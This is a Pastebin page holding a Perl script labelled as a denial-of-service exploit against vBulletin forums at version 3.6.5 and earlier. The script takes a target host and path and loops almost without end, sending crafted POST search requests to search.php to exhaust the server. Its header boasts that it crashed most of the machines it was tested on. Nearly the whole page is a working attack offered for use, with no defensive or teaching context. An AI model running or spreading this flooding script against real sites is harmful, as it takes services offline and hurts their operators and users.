Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # VBulletin DoS Exploit
- #
- # The exploit was tested on 15 machines And 13 of them got Crashed. 98% Works;)
- #
- # important => Make sure that Image Verification in (search.php) is NOT Enabled.
- # It works on 3.6.5 and prior [all] !
- #
- #Perl Script
- use Socket;
- if (@ARGV < 2) { &usage; }
- $rand=rand(10);
- $host = $ARGV[0];
- $dir = $ARGV[1];
- $host =~ s/(http:\/\/)//eg;
- for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++)
- {
- $user="h4x0r".$rand.$i;
- $data = "s=&do=process&query=$user&titleonly=0&starteronly =0&exactname=1&replyless=0&replylimit=3&searchdate =1&beforeafter=before&sortby=title&order=descendin g&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";
- $len = length $data;
- $foo = "POST ".$dir."search.php HTTP/1.1\r\n".
- "Accept: */*\r\n".
- "Accept-Language: en-gb\r\n".
- "Content-Type: application/x-www-form-urlencoded\r\n".
- "Accept-Encoding: gzip, deflate\r\n".
- "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
- "Host: $host\r\n".
- "Content-Length: $len\r\n".
- "Connection: Keep-Alive\r\n".
- "Cache-Control: no-cache\r\n\r\n".
- "$data";
- my $port = "80";
- my $proto = getprotobyname('tcp');
- socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
- connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
- send(SOCKET,"$foo", 0);
- syswrite STDOUT, "|";
- }
- print "\n\n";
- system('ping $host');
- sub usage {
- print "\tusage: \n";
- print "\t$0 \n";
- print "\tex: $0 127.0.0.1 /forum/\n";
- print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n";
- exit();
- };
Add Comment
Please, Sign In to add comment